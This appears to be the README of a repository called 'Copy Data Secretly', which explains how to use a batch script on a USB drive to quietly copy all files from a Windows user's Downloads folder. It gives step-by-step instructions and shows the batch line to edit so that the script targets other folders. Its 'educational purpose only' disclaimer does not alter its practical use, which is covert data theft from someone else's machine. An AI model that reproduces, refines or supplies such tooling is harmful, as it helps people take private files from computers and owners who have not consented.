Copy Data Secretly v1.0
This repo is made for educational purpose only. I do not encourage the use of this with bad intentions. A guide on how to copy all files from a user's "downloads" folder to your removable device.
- Download the "files" folder and copy it on a removable device.
- Plug the removable device in any windows device.
- Run "launch.bat" located inside the files folder.
- Wait for the time you expect files to be copied normally.
If you want to copy a specific folder then:
- Open the "files" folder.
- Right click on "file.bat", choose "edit with Notepad".
- look for the line with code shown below.
%backupcmd% "%USERPROFILE%\downloads" "%drive%\all"
- replace the first part with the path to folder you want to copy.